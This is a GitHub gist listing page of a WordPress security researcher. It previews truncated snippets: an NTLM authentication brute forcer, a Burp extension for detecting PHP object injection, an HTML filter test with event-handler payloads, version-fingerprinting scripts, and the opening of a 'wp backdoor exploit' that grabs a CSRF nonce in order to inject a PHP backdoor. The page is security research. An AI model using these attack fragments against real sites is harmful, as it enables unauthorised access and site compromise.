Skip to content

Instantly share code, notes, and snippets.

Ryan Dewhurst ethicalhack3r

Block or report user

Report or block ethicalhack3r

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View mad5.txt
Yes, this is a joke. But we will really be releasing a WordPress plugin. Let us know if you find any vulnerabilities ;)
ethicalhack3r / http_ntlm__auth_brute.rb
Created Aug 17, 2018
Brute Forces HTTP NTLM Basic Authentication using Typhoeus
View http_ntlm__auth_brute.rb
#!/usr/bin/env ruby
require 'typhoeus'
target_url = ARGV[0]
usernames =[1]).split("\n")
passwords =[2]).split("\n")
hydra =
ethicalhack3r / wp_php_object_injection.rb
Last active Jun 11, 2018
Burp Suite Extension to detect PHP Object Injection in WordPress Plugins (read the code comments for additional info)
View wp_php_object_injection.rb
java_import 'burp.IBurpExtender'
java_import 'burp.IScannerCheck'
java_import 'burp.IScanIssue'
require 'java'
java_import 'java.util.Arrays'
java_import 'java.util.ArrayList'
# You will need to download JRuby's Complete.jar file from and configure Burp Extender with its path.
ethicalhack3r / html_test.html
Created Mar 6, 2017 — forked from rwestergren/html_test.html
HTML Email Filter Test
View html_test.html
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o
ethicalhack3r / magento_version.rb
Created Dec 12, 2016
Finds the remote version of magento
View magento_version.rb
#!/usr/bin/env ruby
require 'typhoeus'
require 'json'
require 'uri'
require 'digest/md5'
target = ARGV[0]
ethicalhack3r / events.txt
Last active Oct 5, 2016
List of event attributes
View events.txt
ethicalhack3r /
Created Feb 29, 2016
[CFP] EuskalHack (San Sebastian / Donostia) 2016


EuskalHack Security Congress is the first Ethical Hacking association in Euskadi, with the aim of promoting the community and culture in digital security to anyone who may be interested.

This exclusive conference is shaping up to be the most relevant in the Basque Country, with an estimated 125 attendees for the first edition.

The participants include specialised companies, state security organisations, professionals, hobbyists and students in the area of security and Information Technology.

Estimated date and location

ethicalhack3r / chrome-uri.txt
Last active Apr 11, 2018
Chrome 'protocol handlers' extracted from Google Chrome browser source code (chromium-50.0.2624.0.tar.xz downloaded from A lot will not work, some are probably from unit tests.
View chrome-uri.txt
ethicalhack3r / backdoor.js
Last active Oct 13, 2017
wp backdoor exploit (injects a PHP backdoor)
View backdoor.js
var wpnonce = '';
function getCSRFNonce(callback)
var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/
var xhr = new XMLHttpRequest();"GET", "", true);
xhr.withCredentials = true;
View post.txt
When you first release software online you don't put too much thought into the software license (I didn't at least). You have no idea if the project will take off. If your intention is for your peers to use it freely your first thought may be Open Source. The most popular Open Source license is the GNU GPL, so why not use that!?
I released WPScan on the 16th of June 2011 along with the GNU GPL license. After a while I built up a team, The WPScan Team, which were people who had the same goals as me, to make an awesome black box WordPress scanning tool. The WPScan Team (3 other awesome people) and I have been working on WPScan in our spare time as volunteers for almost 4 years. Countless hours, days, weeks and months of man hours have been put into WPScan and recently the WPScan Vulnerability Database by us.
And we don't mind this, we do it because we want our peers to be able to use the software freely. We do it because we want to use the software ourselves. Of course there is no selfless deed, we do it for
You can’t perform that action at this time.